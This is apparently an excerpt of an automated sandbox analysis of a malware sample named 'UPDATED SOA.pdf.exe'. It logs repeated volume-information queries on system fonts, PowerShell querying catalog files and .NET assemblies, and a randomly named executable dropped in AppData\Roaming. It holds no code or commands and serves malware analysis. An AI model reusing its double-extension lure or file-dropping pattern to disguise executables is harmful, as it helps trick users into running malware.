                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeQueries volume information: C:\Windows\Fonts\DUBAI-REGULAR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\TKgtDXuaZu.exeQueries volume information: C:\Users\user\AppData\Roaming\TKgtDXuaZu.exe VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\TKgtDXuaZu.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\TKgtDXuaZu.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
